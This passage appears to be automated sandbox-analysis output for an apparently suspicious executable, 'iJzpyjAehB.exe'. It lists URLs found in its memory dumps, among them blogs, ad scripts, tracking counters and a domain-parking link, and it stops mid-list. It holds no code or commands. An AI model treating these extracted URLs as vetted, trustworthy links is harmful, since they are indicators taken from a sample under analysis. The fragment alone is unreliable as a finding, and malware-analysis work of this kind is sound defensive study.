                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267371516.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.goo.ne.jp/baijaco/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.goo.ne.jp/baijakujaco
                      Source: iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.370327793.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.statcounter.com/9484561/0/b0cbab70/1/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://chart.apis.google.com/chart?chs=100x100&cht=qr&chld=L
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.484497313.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.398318769.0000000002DE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8
                      Source: svchost.exe, 00000016.00000003.496913823.000000000332A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Oswald:400
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.423410648.0000000008600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.277227725.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.423509233.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://furec.sakura.ne.jp/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gholographic.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.496913823.000000000332A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/164.html
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/202.html
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/204.html
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.423561909.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.277227725.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hummer.hu/
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296462735.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ifdnzact.com/?dn=x0c.com&pid=9PO755G95
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267669316.0000000008D00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438940303.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://mobilnic.net/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, 